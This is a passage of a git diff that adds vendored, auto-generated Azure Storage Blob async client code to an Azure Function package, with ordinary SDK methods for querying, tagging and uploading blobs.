query_request: Optional["_models.QueryRequest"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> IO: + """The Query operation enables users to select/project on blob data by providing simple query + expressions. + + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param query_request: the query request. Default value is None. + :type query_request: ~azure.storage.blob.models.QueryRequest + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword comp: comp. Default value is "query". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: IO, or the result of cls(response) + :rtype: IO + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[IO] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "query") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _lease_id = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + if query_request is not None: + _content = self._serialize.body(query_request, 'QueryRequest', is_xml=True) + else: + _content = None + + request = build_query_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + snapshot=snapshot, + timeout=timeout, + lease_id=_lease_id, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + template_url=self.query.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=True, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200, 206]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + if response.status_code == 200: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if response.status_code == 206: + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['x-ms-meta']=self._deserialize('{str}', response.headers.get('x-ms-meta')) + response_headers['Content-Length']=self._deserialize('long', response.headers.get('Content-Length')) + response_headers['Content-Type']=self._deserialize('str', response.headers.get('Content-Type')) + response_headers['Content-Range']=self._deserialize('str', response.headers.get('Content-Range')) + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['Content-Encoding']=self._deserialize('str', response.headers.get('Content-Encoding')) + response_headers['Cache-Control']=self._deserialize('str', response.headers.get('Cache-Control')) + response_headers['Content-Disposition']=self._deserialize('str', response.headers.get('Content-Disposition')) + response_headers['Content-Language']=self._deserialize('str', response.headers.get('Content-Language')) + response_headers['x-ms-blob-sequence-number']=self._deserialize('long', response.headers.get('x-ms-blob-sequence-number')) + response_headers['x-ms-blob-type']=self._deserialize('str', response.headers.get('x-ms-blob-type')) + response_headers['x-ms-content-crc64']=self._deserialize('bytearray', response.headers.get('x-ms-content-crc64')) + response_headers['x-ms-copy-completion-time']=self._deserialize('rfc-1123', response.headers.get('x-ms-copy-completion-time')) + response_headers['x-ms-copy-status-description']=self._deserialize('str', response.headers.get('x-ms-copy-status-description')) + response_headers['x-ms-copy-id']=self._deserialize('str', response.headers.get('x-ms-copy-id')) + response_headers['x-ms-copy-progress']=self._deserialize('str', response.headers.get('x-ms-copy-progress')) + response_headers['x-ms-copy-source']=self._deserialize('str', response.headers.get('x-ms-copy-source')) + response_headers['x-ms-copy-status']=self._deserialize('str', response.headers.get('x-ms-copy-status')) + response_headers['x-ms-lease-duration']=self._deserialize('str', response.headers.get('x-ms-lease-duration')) + response_headers['x-ms-lease-state']=self._deserialize('str', response.headers.get('x-ms-lease-state')) + response_headers['x-ms-lease-status']=self._deserialize('str', response.headers.get('x-ms-lease-status')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Accept-Ranges']=self._deserialize('str', response.headers.get('Accept-Ranges')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-blob-committed-block-count']=self._deserialize('int', response.headers.get('x-ms-blob-committed-block-count')) + response_headers['x-ms-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + response_headers['x-ms-blob-content-md5']=self._deserialize('bytearray', response.headers.get('x-ms-blob-content-md5')) + + deserialized = response.stream_download(self._client._pipeline) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + query.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def get_tags( + self, + timeout: Optional[int] = None, + request_id_parameter: Optional[str] = None, + snapshot: Optional[str] = None, + version_id: Optional[str] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> "_models.BlobTags": + """The Get Tags operation enables users to get the tags associated with a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param snapshot: The snapshot parameter is an opaque DateTime value that, when present, + specifies the blob snapshot to retrieve. For more information on working with blob snapshots, + see :code:`Creating + a Snapshot of a Blob.`. Default value is None. + :type snapshot: str + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "tags". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: BlobTags, or the result of cls(response) + :rtype: ~azure.storage.blob.models.BlobTags + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType["_models.BlobTags"] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tags") # type: str + + _if_tags = None + _lease_id = None + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + + request = build_get_tags_request( + url=self._config.url, + comp=comp, + version=self._config.version, + timeout=timeout, + request_id_parameter=request_id_parameter, + snapshot=snapshot, + version_id=version_id, + if_tags=_if_tags, + lease_id=_lease_id, + template_url=self.get_tags.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [200]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + deserialized = self._deserialize('BlobTags', pipeline_response) + + if cls: + return cls(pipeline_response, deserialized, response_headers) + + return deserialized + + get_tags.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def set_tags( # pylint: disable=inconsistent-return-statements + self, + timeout: Optional[int] = None, + version_id: Optional[str] = None, + transactional_content_md5: Optional[bytearray] = None, + transactional_content_crc64: Optional[bytearray] = None, + request_id_parameter: Optional[str] = None, + tags: Optional["_models.BlobTags"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Set Tags operation enables users to set tags on a blob. + + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param version_id: The version id parameter is an opaque DateTime value that, when present, + specifies the version of the blob to operate on. It's for service version 2019-10-10 and newer. + Default value is None. + :type version_id: str + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param transactional_content_crc64: Specify the transactional crc64 for the body, to be + validated by the service. Default value is None. + :type transactional_content_crc64: bytearray + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param tags: Blob tags. Default value is None. + :type tags: ~azure.storage.blob.models.BlobTags + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :keyword comp: comp. Default value is "tags". Note that overriding this default value may + result in unsupported behavior. + :paramtype comp: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + comp = kwargs.pop('comp', "tags") # type: str + content_type = kwargs.pop('content_type', "application/xml") # type: Optional[str] + + _if_tags = None + _lease_id = None + if modified_access_conditions is not None: + _if_tags = modified_access_conditions.if_tags + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if tags is not None: + _content = self._serialize.body(tags, 'BlobTags', is_xml=True) + else: + _content = None + + request = build_set_tags_request( + url=self._config.url, + comp=comp, + version=self._config.version, + content_type=content_type, + content=_content, + timeout=timeout, + version_id=version_id, + transactional_content_md5=transactional_content_md5, + transactional_content_crc64=transactional_content_crc64, + request_id_parameter=request_id_parameter, + if_tags=_if_tags, + lease_id=_lease_id, + template_url=self.set_tags.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [204]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + set_tags.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_block_blob_operations.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_block_blob_operations.py new file mode 100644 index 0000000..18f2f2f --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/storage/blob/_generated/aio/operations/_block_blob_operations.py @@ -0,0 +1,1064 @@ +# pylint: disable=too-many-lines +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for license information. +# Code generated by Microsoft (R) AutoRest Code Generator. +# Changes may cause incorrect behavior and will be lost if the code is regenerated. +# -------------------------------------------------------------------------- +import datetime +from typing import Any, Callable, Dict, IO, Optional, TypeVar, Union + +from azure.core.exceptions import ClientAuthenticationError, HttpResponseError, ResourceExistsError, ResourceNotFoundError, map_error +from azure.core.pipeline import PipelineResponse +from azure.core.pipeline.transport import AsyncHttpResponse +from azure.core.rest import HttpRequest +from azure.core.tracing.decorator_async import distributed_trace_async + +from ... import models as _models +from ..._vendor import _convert_request +from ...operations._block_blob_operations import build_commit_block_list_request, build_get_block_list_request, build_put_blob_from_url_request, build_stage_block_from_url_request, build_stage_block_request, build_upload_request +T = TypeVar('T') +ClsType = Optional[Callable[[PipelineResponse[HttpRequest, AsyncHttpResponse], T, Dict[str, Any]], Any]] + +class BlockBlobOperations: + """ + .. warning:: + **DO NOT** instantiate this class directly. + + Instead, you should access the following operations through + :class:`~azure.storage.blob.aio.AzureBlobStorage`'s + :attr:`block_blob` attribute. + """ + + models = _models + + def __init__(self, *args, **kwargs) -> None: + args = list(args) + self._client = args.pop(0) if args else kwargs.pop("client") + self._config = args.pop(0) if args else kwargs.pop("config") + self._serialize = args.pop(0) if args else kwargs.pop("serializer") + self._deserialize = args.pop(0) if args else kwargs.pop("deserializer") + + + @distributed_trace_async + async def upload( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + body: IO, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + blob_tags_string: Optional[str] = None, + immutability_policy_expiry: Optional[datetime.datetime] = None, + immutability_policy_mode: Optional[Union[str, "_models.BlobImmutabilityPolicyMode"]] = None, + legal_hold: Optional[bool] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Upload Block Blob operation updates the content of an existing block blob. Updating an + existing block blob overwrites any existing metadata on the blob. Partial updates are not + supported with Put Blob; the content of the existing blob is overwritten with the content of + the new blob. To perform a partial update of the content of a block blob, use the Put Block + List operation. + + :param content_length: The length of the request. + :type content_length: long + :param body: Initial data. + :type body: IO + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param immutability_policy_expiry: Specifies the date time when the blobs immutability policy + is set to expire. Default value is None. + :type immutability_policy_expiry: ~datetime.datetime + :param immutability_policy_mode: Specifies the immutability policy mode to set on the blob. + Default value is None. + :type immutability_policy_mode: str or ~azure.storage.blob.models.BlobImmutabilityPolicyMode + :param legal_hold: Specified if a legal hold should be set on the blob. Default value is None. + :type legal_hold: bool + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + content_type = kwargs.pop('content_type', "application/octet-stream") # type: Optional[str] + + _blob_content_type = None + _blob_content_encoding = None + _blob_content_language = None + _blob_content_md5 = None + _blob_cache_control = None + _lease_id = None + _blob_content_disposition = None + _encryption_key = None + _encryption_key_sha256 = None + _encryption_algorithm = None + _encryption_scope = None + _if_modified_since = None + _if_unmodified_since = None + _if_match = None + _if_none_match = None + _if_tags = None + if blob_http_headers is not None: + _blob_content_type = blob_http_headers.blob_content_type + _blob_content_encoding = blob_http_headers.blob_content_encoding + _blob_content_language = blob_http_headers.blob_content_language + _blob_content_md5 = blob_http_headers.blob_content_md5 + _blob_cache_control = blob_http_headers.blob_cache_control + if lease_access_conditions is not None: + _lease_id = lease_access_conditions.lease_id + if blob_http_headers is not None: + _blob_content_disposition = blob_http_headers.blob_content_disposition + if cpk_info is not None: + _encryption_key = cpk_info.encryption_key + _encryption_key_sha256 = cpk_info.encryption_key_sha256 + _encryption_algorithm = cpk_info.encryption_algorithm + if cpk_scope_info is not None: + _encryption_scope = cpk_scope_info.encryption_scope + if modified_access_conditions is not None: + _if_modified_since = modified_access_conditions.if_modified_since + _if_unmodified_since = modified_access_conditions.if_unmodified_since + _if_match = modified_access_conditions.if_match + _if_none_match = modified_access_conditions.if_none_match + _if_tags = modified_access_conditions.if_tags + _content = body + + request = build_upload_request( + url=self._config.url, + blob_type=blob_type, + version=self._config.version, + content_type=content_type, + content=_content, + content_length=content_length, + timeout=timeout, + transactional_content_md5=transactional_content_md5, + blob_content_type=_blob_content_type, + blob_content_encoding=_blob_content_encoding, + blob_content_language=_blob_content_language, + blob_content_md5=_blob_content_md5, + blob_cache_control=_blob_cache_control, + metadata=metadata, + lease_id=_lease_id, + blob_content_disposition=_blob_content_disposition, + encryption_key=_encryption_key, + encryption_key_sha256=_encryption_key_sha256, + encryption_algorithm=_encryption_algorithm, + encryption_scope=_encryption_scope, + tier=tier, + if_modified_since=_if_modified_since, + if_unmodified_since=_if_unmodified_since, + if_match=_if_match, + if_none_match=_if_none_match, + if_tags=_if_tags, + request_id_parameter=request_id_parameter, + blob_tags_string=blob_tags_string, + immutability_policy_expiry=immutability_policy_expiry, + immutability_policy_mode=immutability_policy_mode, + legal_hold=legal_hold, + template_url=self.upload.metadata['url'], + ) + request = _convert_request(request) + request.url = self._client.format_url(request.url) + + pipeline_response = await self._client._pipeline.run( # pylint: disable=protected-access + request, + stream=False, + **kwargs + ) + response = pipeline_response.http_response + + if response.status_code not in [201]: + map_error(status_code=response.status_code, response=response, error_map=error_map) + error = self._deserialize.failsafe_deserialize(_models.StorageError, pipeline_response) + raise HttpResponseError(response=response, model=error) + + response_headers = {} + response_headers['ETag']=self._deserialize('str', response.headers.get('ETag')) + response_headers['Last-Modified']=self._deserialize('rfc-1123', response.headers.get('Last-Modified')) + response_headers['Content-MD5']=self._deserialize('bytearray', response.headers.get('Content-MD5')) + response_headers['x-ms-client-request-id']=self._deserialize('str', response.headers.get('x-ms-client-request-id')) + response_headers['x-ms-request-id']=self._deserialize('str', response.headers.get('x-ms-request-id')) + response_headers['x-ms-version']=self._deserialize('str', response.headers.get('x-ms-version')) + response_headers['x-ms-version-id']=self._deserialize('str', response.headers.get('x-ms-version-id')) + response_headers['Date']=self._deserialize('rfc-1123', response.headers.get('Date')) + response_headers['x-ms-request-server-encrypted']=self._deserialize('bool', response.headers.get('x-ms-request-server-encrypted')) + response_headers['x-ms-encryption-key-sha256']=self._deserialize('str', response.headers.get('x-ms-encryption-key-sha256')) + response_headers['x-ms-encryption-scope']=self._deserialize('str', response.headers.get('x-ms-encryption-scope')) + + + if cls: + return cls(pipeline_response, None, response_headers) + + upload.metadata = {'url': "{url}/{containerName}/{blob}"} # type: ignore + + + @distributed_trace_async + async def put_blob_from_url( # pylint: disable=inconsistent-return-statements + self, + content_length: int, + copy_source: str, + timeout: Optional[int] = None, + transactional_content_md5: Optional[bytearray] = None, + metadata: Optional[Dict[str, str]] = None, + tier: Optional[Union[str, "_models.AccessTierOptional"]] = None, + request_id_parameter: Optional[str] = None, + source_content_md5: Optional[bytearray] = None, + blob_tags_string: Optional[str] = None, + copy_source_blob_properties: Optional[bool] = None, + copy_source_authorization: Optional[str] = None, + copy_source_tags: Optional[Union[str, "_models.BlobCopySourceTags"]] = None, + blob_http_headers: Optional["_models.BlobHTTPHeaders"] = None, + lease_access_conditions: Optional["_models.LeaseAccessConditions"] = None, + cpk_info: Optional["_models.CpkInfo"] = None, + cpk_scope_info: Optional["_models.CpkScopeInfo"] = None, + modified_access_conditions: Optional["_models.ModifiedAccessConditions"] = None, + source_modified_access_conditions: Optional["_models.SourceModifiedAccessConditions"] = None, + **kwargs: Any + ) -> None: + """The Put Blob from URL operation creates a new Block Blob where the contents of the blob are + read from a given URL. This API is supported beginning with the 2020-04-08 version. Partial + updates are not supported with Put Blob from URL; the content of an existing blob is + overwritten with the content of the new blob. To perform partial updates to a block blob’s + contents using a source URL, use the Put Block from URL API in conjunction with Put Block List. + + :param content_length: The length of the request. + :type content_length: long + :param copy_source: Specifies the name of the source page blob snapshot. This value is a URL of + up to 2 KB in length that specifies a page blob snapshot. The value should be URL-encoded as it + would appear in a request URI. The source blob must either be public or must be authenticated + via a shared access signature. + :type copy_source: str + :param timeout: The timeout parameter is expressed in seconds. For more information, see + :code:`Setting + Timeouts for Blob Service Operations.`. Default value is None. + :type timeout: int + :param transactional_content_md5: Specify the transactional md5 for the body, to be validated + by the service. Default value is None. + :type transactional_content_md5: bytearray + :param metadata: Optional. Specifies a user-defined name-value pair associated with the blob. + If no name-value pairs are specified, the operation will copy the metadata from the source blob + or file to the destination blob. If one or more name-value pairs are specified, the destination + blob is created with the specified metadata, and metadata is not copied from the source blob or + file. Note that beginning with version 2009-09-19, metadata names must adhere to the naming + rules for C# identifiers. See Naming and Referencing Containers, Blobs, and Metadata for more + information. Default value is None. + :type metadata: dict[str, str] + :param tier: Optional. Indicates the tier to be set on the blob. Default value is None. + :type tier: str or ~azure.storage.blob.models.AccessTierOptional + :param request_id_parameter: Provides a client-generated, opaque value with a 1 KB character + limit that is recorded in the analytics logs when storage analytics logging is enabled. Default + value is None. + :type request_id_parameter: str + :param source_content_md5: Specify the md5 calculated for the range of bytes that must be read + from the copy source. Default value is None. + :type source_content_md5: bytearray + :param blob_tags_string: Optional. Used to set blob tags in various blob operations. Default + value is None. + :type blob_tags_string: str + :param copy_source_blob_properties: Optional, default is true. Indicates if properties from + the source blob should be copied. + :type copy_source_blob_properties: bool + :param copy_source_authorization: Only Bearer type is supported. Credentials should be a valid + OAuth access token to copy source. Default value is None. + :type copy_source_authorization: str + :param copy_source_tags: Optional, default 'replace'. Indicates if source tags should be + copied or replaced with the tags specified by x-ms-tags. Default value is None. + :type copy_source_tags: str or ~azure.storage.blob.models.BlobCopySourceTags + :param blob_http_headers: Parameter group. Default value is None. + :type blob_http_headers: ~azure.storage.blob.models.BlobHTTPHeaders + :param lease_access_conditions: Parameter group. Default value is None. + :type lease_access_conditions: ~azure.storage.blob.models.LeaseAccessConditions + :param cpk_info: Parameter group. Default value is None. + :type cpk_info: ~azure.storage.blob.models.CpkInfo + :param cpk_scope_info: Parameter group. Default value is None. + :type cpk_scope_info: ~azure.storage.blob.models.CpkScopeInfo + :param modified_access_conditions: Parameter group. Default value is None. + :type modified_access_conditions: ~azure.storage.blob.models.ModifiedAccessConditions + :param source_modified_access_conditions: Parameter group. Default value is None. + :type source_modified_access_conditions: + ~azure.storage.blob.models.SourceModifiedAccessConditions + :keyword blob_type: Specifies the type of blob to create: block blob, page blob, or append + blob. Default value is "BlockBlob". Note that overriding this default value may result in + unsupported behavior. + :paramtype blob_type: str + :keyword callable cls: A custom type or function that will be passed the direct response + :return: None, or the result of cls(response) + :rtype: None + :raises: ~azure.core.exceptions.HttpResponseError + """ + cls = kwargs.pop('cls', None) # type: ClsType[None] + error_map = { + 401: ClientAuthenticationError, 404: ResourceNotFoundError, 409: ResourceExistsError + } + error_map.update(kwargs.pop('error_map', {})) + + blob_type = kwargs.pop('blob_type', "BlockBlob") # type: str + + _blob_content_type = None + _blob_content_encoding = 